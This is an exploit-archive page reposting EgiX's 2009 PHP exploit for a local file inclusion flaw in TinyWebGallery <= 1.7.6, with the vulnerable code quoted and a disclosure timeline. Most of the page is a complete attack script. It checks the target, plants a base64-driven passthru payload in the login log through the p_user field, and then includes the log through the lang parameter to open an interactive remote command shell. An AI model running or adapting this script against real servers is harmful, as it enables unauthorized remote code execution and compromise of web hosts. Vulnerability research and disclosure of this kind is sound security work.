首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
TinyWebGallery <= 1.7.6 LFI / Remote Code Execution Exploit
来源:n0b0d13s[at]gmail[dot]com 作者:EgiX 发布时间:2009-05-09  

<?php

/*
 -----------------------------------------------------------
 TinyWebGallery <= 1.7.6 LFI / Remote Code Execution Exploit
 -----------------------------------------------------------
 
 author...: EgiX
 mail.....: n0b0d13s[at]gmail[dot]com
 
 link.....: http://www.tinywebgallery.com/
 details..: this vulnerability drift from QuiXplorer (http://quixplorer.sourceforge.net/)

 This PoC was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.

 [-] vulnerable code in /admin/_include/init.php

 110. // Get Language
 111. if (isset($GLOBALS['__GET']["lang"]))  $GLOBALS["lang"] = $GLOBALS["language"] = $_SESSION["admin_lang"] =  $GLOBALS['__GET']["lang"];
 112. elseif (isset($GLOBALS['__POST']["lang"])) $GLOBALS["lang"] = $GLOBALS["language"] = $_SESSION["admin_lang"] =  $GLOBALS['__POST']["lang"];
 113. else if (isset($_SESSION["admin_lang"])) $GLOBALS["lang"] = $GLOBALS["language"] = $_SESSION["admin_lang"]; 
 114. else $GLOBALS["language"] = $GLOBALS["default_language"];
 115. 
   [...]
 138. 
 139. // ------------------------------------------------------------------------------
 140. // Necessary files
 141. require _QUIXPLORER_PATH . "/_config/conf.php";
 142. 
 143. if (file_exists(_QUIXPLORER_PATH . "/_lang/" . $GLOBALS["language"] . ".php"))
 144.     require _QUIXPLORER_PATH . "/_lang/" . $GLOBALS["language"] . ".php";
 145. else if (file_exists(_QUIXPLORER_PATH . "/_lang/" . $GLOBALS["default_language"] . ".php"))
 146.     require _QUIXPLORER_PATH . "/_lang/" . $GLOBALS["default_language"] . ".php";
 147. else
 148.     require _QUIXPLORER_PATH . "/_lang/en.php";

 An attacker could be able to include arbitrary local files through the require function at line 144, due to
 $_GET['lang'] parameter isn't properly sanitised. Successful exploitation requires magic_quotes_gpc = off

 [-] Disclosure timeline:
  
 [14/04/2009] - Bug discovered
 [25/04/2009] - Vendor contacted
 [26/04/2009] - Vendor replied
 [26/04/2009] - Fix released: http://www.tinywebgallery.com/forum/viewtopic.php?t=1653
 [08/05/2009] - Public disclosure

*/

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

function http_send($host, $packet)
{
 if (($s = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) == false)
   die("\nsocket_create(): " . socket_strerror($s) . "\n");

 if (socket_connect($s, $host, 80) == false)
   die("\nsocket_connect(): " . socket_strerror(socket_last_error()) . "\n");

 socket_write($s, $packet, strlen($packet));
 while ($m = socket_read($s, 2048)) $response .= $m;

 socket_close($s);
 return $response;
}

function check_target()
{
 global $host, $path;

 $packet  = "GET {$path}info.php?showphpinfo=true HTTP/1.0\r\n";
 $packet .= "Host: {$host}\r\n";
 $packet .= "Connection: close\r\n\r\n";

 preg_match('/magic_quotes_gpc<\/td><td class="v">(.*)<\/td><td/', http_send($host, $packet), $match);

 if ($match[1] != "Off") die("\n[-] Exploit failed...magic_quotes_gpc = on\n");
}

function inject_code()
{
 global $host, $path;

 $code  = "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${die} ?>";
 $payload = "p_user={$code}&p_pass=";

 $packet  = "POST {$path}admin/index.php?action=login HTTP/1.0\r\n";
 $packet .= "Host: {$host}\r\n";
 $packet .= "Content-Length: ".strlen($payload)."\r\n";
 $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
 $packet .= "Connection: close\r\n\r\n";
 $packet .= $payload;

 http_send($host, $packet);
}

print "\n+---------------------------------------------------------------------+";
print "\n| TinyWebGallery <= 1.7.6 LFI / Remote Code Execution Exploit by EgiX |";
print "\n+---------------------------------------------------------------------+\n";

if ($argc < 3)
{
 print "\nUsage......: php $argv[0] host path\n";
 print "\nExample....: php $argv[0] localhost /";
 print "\nExample....: php $argv[0] localhost /twg/\n";
 die();
}

$host = $argv[1];
$path = $argv[2];

check_target();
inject_code();

$packet  = "GET {$path}admin/index.php?lang=../../counter/_twg.log%%00 HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";

while (1)
{
 print "\ntwg-shell# ";
 if (($cmd = trim(fgets(STDIN))) == "exit") break;
 $response = http_send($host, sprintf($packet, base64_encode($cmd)));
 preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
}

?>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·RTWebalbum 1.0.462 (AlbumID) B
·TYPSoft FTP Server 1.11 (ABORT
·Mortbay Jetty <= 7.0.0-pre5 Di
·Mereo 1.8.0 Arbitrary File Dis
·Luxbum 0.5.5/stable (Auth Bypa
·eggBlog <= 4.1.1 Local Directo
·ViPlay3 <= 3.00 (.vpl) Local S
·microTopic v1 (rating) Remote
·MPLAB IDE 8.30 (.mcp) Universa
·Personal FTP Server versions u
·Exploits BLIND SQL INJECTION (
·TinyWebGallery <= 1.7.6 LFI /
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved